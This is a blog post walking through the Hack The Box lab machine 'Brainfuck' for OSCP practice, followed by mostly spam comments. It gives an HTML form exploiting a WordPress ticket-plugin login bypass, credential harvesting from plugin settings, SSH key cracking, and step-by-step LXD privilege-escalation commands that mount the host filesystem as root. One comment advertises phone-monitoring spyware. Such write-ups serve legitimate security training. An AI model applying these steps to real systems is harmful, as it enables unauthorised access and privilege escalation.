OSCP PREPROTİONS – HTB Brainfuck

Brainfuck machine is a vulnerable machine with Linux operating system which is among the retired machines. It is expected to obtain user and root flags using these vulnerabilities.
We perform a network scan with nmap to recognize the target machine.
Classic Scan

Full Port Scan

Network scan 22/tcp ssh OpenSSH, 25/tcp smtp Postfix smtpd, 110/tcp pop3 Dovecot pop3d, 143/tcp imap Dovecot imapd, 443/tcp ssl/http nginx ports are open.

In the 443 port scan, domain name and DNS names were given to us here and we wrote them to /etc,7hosts file

Then let’s access these sites.
https://brainfuck.htb/

When we looked with Wapalanzlyzer, we realized that it uses wordpress CMS application, let’s scan it with wpscan.

Here we see that the ticket plugin version is old. Note it and continue enumueration
User enumueration
wpscan https://brainfuck.htb –disable-tls-checks –enumerate u

admin and administrator users have been detected.
We are looking for a vulnerability in the version of the WP Support Plus Responsive Ticket System plugin I detected.

We have seen Sql injection, let’s see how to use this vulnerability here

Create an html file according to the commands given here and put it in 
<form method="post" action="https://brainfuck.htb/wp-admin/admin-ajax.php">
        Username: <input type="text" name="username" value="administrator">
        <input type="hidden" name="email" value="sth">
        <input type="hidden" name="action" value="loginGuestFacebook">
        <input type="submit" value="Login">
</form>
We are expected to write. We provided this and presented we server with python and then we were able to log in when we sent this form.

When we deleted wp-admin/admin-ajax.php in the url section and continued, we saw that there was login from the admin user.

We can see it here on the admin page.
We were able to log in.

This way we accessed the admin dashboard.
Let’s provide enumeration here.
The dev updaye part that is written on the web comes to mind may be something related to SMTP.

Let’s enter smtp settings from plugins here.

The password “kHGuERB29DNiNE” was detected in smtp for user orestis.
Let’s use this information to establish a connection.

Hi there, your credentials for our “secret” forum are below 🙂

username: orestis
password: kIEnnfEKJ#9UmdO
Here we have detected the credential information for the secret. Here we thought of the secret that exists as a subdomain, let’s try to connect there with this credential information

Here we see the form text related to the ssh key.

Here we see enceretyot messages.
Let’s try to make sense of them

We see that it is cryptolized as Vigenere
Let’s break these messages

We realized that it is id_rsa in https://brainfuck.htb/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa ulrlinde.

When we tried to connect to id_rsa, it asked us for a password, let’s break it with john the ripper

We cracked the ssh key and got 3poulakia! We got the password

Here we got our user flag, but we couldn’t access root because we don’t have root authorization.
The debug.txt encrypt.sage output.txt files on the desktop are remarkable. When we read them, we see them as rsa encrytp.

By breaking this, root.flag can also be read, but it does not give us ir Shell, so we investigated methods to obtain root Shell by providing local enumeration.

Here we see lxd.
Let’s see if this can be done privilege escalation.
https://www.hackingarticles.in/lxd-privilege-escalation/?source=post_page—–9a326bcb426a
The procedures given in the address were carried out one by one
commands applied sequentially
attacker on the machine
1- git clone https://github.com/saghul/lxd-alpine-builder.git
2- cd lxd-alpine-builder
3- ./build-alpine
4- python -m SimpleHTTPServer
on the target machine
1- wget 10.10.14.19:8000/alpine-v3.18-x86_64-20230927_0640.tar.gz
2- lxc image import ./alpine-v3.18-x86_64-20230927_0640.tar.gz –alias myimage
3- lxc image list
4- lxc init myimage ignite -c security.privileged=true
5- lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
6- lxc start ignite
7- lxc exec ignite /bin/sh
8- id
9- cd mnt/root/root
10- ls
11- cat root.txt

This is how we got the root flag.

Comments

  1. Genny

    I will immediately take hold of your rss feed as I can not
    to find your e-mail subscription link or newsletter service.
    Do you have any? Kindly permit me recognize in order that I
    may just subscribe. Thanks.

  2. Honora

    Hi there just wanted to give you a brief heads up and let you know a few of the pictures aren’t loading correctly.
    I’m not sure why but I think its a linking issue.
    I’ve tried it in two different internet browsers and
    both show the same outcome.

  3. Cristino

    Heya! I just wanted to ask if you ever have any trouble with hackers?
    My last blog (wordpress) was hacked and I ended up losing several weeks of hard
    work due to no data backup. Do you have any solutions
    to prevent hackers?

  4. Tearra

    Wow, incredible blog layout! How long have you been blogging for?
    you make blogging look easy. The overall look of your website is excellent, as well as the content!

  5. Kerbi

    Oh my goodness! Incredible article dude! Thank you, However I am
    going through troubles with your RSS. I don’t
    know why I am unable to join it. Is there anybody else getting the same RSS issues?
    Anyone that knows the solution can you kindly respond? Thanks!!

  6. sklep internetowy

    Please let me know if you’re looking for a article author
    for your weblog. You have some really great articles and I think I would be a good asset.
    If you ever want to take some of the load off,
    I’d really like to write some material for your blog in exchange for a link back to mine.

    Please blast me an email if interested. Cheers!

    I saw similar here: Sklep online

  7. najlepszy sklep

    Hey! Do you know if they make any plugins to help with SEO?
    I’m trying to get my blog to rank for some targeted
    keywords but I’m not seeing very good gains. If you know of any please share.
    Appreciate it! You can read similar art here: Ecommerce

  8. sklep online

    Hi there! Do you know if they make any plugins to help with Search
    Engine Optimization? I’m trying to get my blog to rank for
    some targeted keywords but I’m not seeing very good results.

    If you know of any please share. Many thanks!
    You can read similar text here: Sklep internetowy

  9. Phone Tracker Free

    CellSpy mobile phone monitoring software is a very safe and complete tool, it is the best choice for effective monitoring of mobile phones. App can monitor various types of messages, such as SMS, email, and instant messaging chat applications such as Snapchat, Facebook, Viber, and Skype. You can view all the contents of the target device: GPS location, photos, videos and browsing history, keyboard input, etc.

  10. hitman.agency

    Good day! Do you know if they make any plugins to assist with Search Engine Optimization? I’m trying to get my
    website to rank for some targeted keywords but I’m not seeing very good
    results. If you know of any please share. Cheers!
    You can read similar text here: Hitman.agency

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir